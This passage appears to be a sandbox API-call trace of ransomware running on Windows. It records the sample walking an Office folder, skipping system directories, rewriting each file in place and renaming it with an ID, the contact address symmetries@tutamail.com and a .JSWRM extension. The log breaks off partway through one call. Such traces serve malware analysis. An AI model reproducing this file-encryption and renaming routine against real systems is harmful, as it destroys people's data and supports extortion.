1 [0142.401] CloseHandle (hObject=0x238) returned 1 [0142.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0142.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0142.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0142.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0142.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0142.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0142.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.401] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICSTYLES.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\picstyles.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICSTYLES.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\picstyles.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0142.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0142.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0142.403] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23441541, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23441541, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PICTPH.POC", cAlternateFileName="")) returned 1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2=".") returned 1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="..") returned 1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="...") returned 1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="windows") returned -1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="recovery") returned -1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="perflogs") returned 1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="documents and settings") returned 1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="system volume information") returned -1 [0142.403] lstrcmpiW (lpString1="PICTPH.POC", lpString2="msocache") returned 1 [0142.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0142.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICTPH.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICTPH.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PICTPH.POC", lpUsedDefaultChar=0x0) returned 10 [0142.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0142.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0142.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICTPH.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICTPH.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PICTPH.POC", lpUsedDefaultChar=0x0) returned 10 [0142.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0142.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0142.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0142.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0142.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICTPH.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pictph.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.405] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=820) returned 1 [0142.405] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x330) returned 0x20e550 [0142.405] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0142.406] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.406] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0142.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0142.407] CloseHandle (hObject=0x238) returned 1 [0142.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0142.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0142.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0142.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0142.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0142.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICTPH.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pictph.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICTPH.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pictph.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0142.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0142.408] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23716220, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23716220, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2373c469, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1722, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PNCTUATE.POC", cAlternateFileName="")) returned 1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2=".") returned 1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="..") returned 1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="...") returned 1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="windows") returned -1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="recovery") returned -1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="perflogs") returned 1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="documents and settings") returned 1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="system volume information") returned -1 [0142.408] lstrcmpiW (lpString1="PNCTUATE.POC", lpString2="msocache") returned 1 [0142.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0142.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PNCTUATE.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PNCTUATE.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PNCTUATE.POC", lpUsedDefaultChar=0x0) returned 12 [0142.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0142.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0142.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PNCTUATE.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PNCTUATE.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PNCTUATE.POC", lpUsedDefaultChar=0x0) returned 12 [0142.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0142.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0142.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0142.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0142.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PNCTUATE.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pnctuate.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.410] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5922) returned 1 [0142.410] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1720) returned 0x27b348 [0142.410] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1720, lpOverlapped=0x0) returned 1 [0142.411] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.412] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1720, lpOverlapped=0x0) returned 1 [0142.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.412] CloseHandle (hObject=0x238) returned 1 [0142.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0142.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0142.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0142.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0142.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0142.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0142.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.412] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PNCTUATE.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pnctuate.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PNCTUATE.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pnctuate.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0142.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0142.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0142.413] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233cee41, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb9b0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="POST98SP.POC", cAlternateFileName="")) returned 1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2=".") returned 1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2="..") returned 1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2="...") returned 1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2="windows") returned -1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2="recovery") returned -1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2="perflogs") returned 1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2="documents and settings") returned 1 [0142.413] lstrcmpiW (lpString1="POST98SP.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.414] lstrcmpiW (lpString1="POST98SP.POC", lpString2="system volume information") returned -1 [0142.414] lstrcmpiW (lpString1="POST98SP.POC", lpString2="msocache") returned 1 [0142.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0142.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST98SP.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POST98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0142.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0142.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0142.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST98SP.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POST98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0142.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0142.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0142.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0142.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0142.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POST98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\post98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.415] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47536) returned 1 [0142.415] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb9b0) returned 0x27b348 [0142.415] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb9b0, lpOverlapped=0x0) returned 1 [0142.419] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.419] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb9b0, lpOverlapped=0x0) returned 1 [0142.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.419] CloseHandle (hObject=0x238) returned 1 [0142.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0142.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0142.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0142.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0142.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0142.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0142.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.420] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POST98SP.POC" (normalized: "c:\\program files\\microsoft 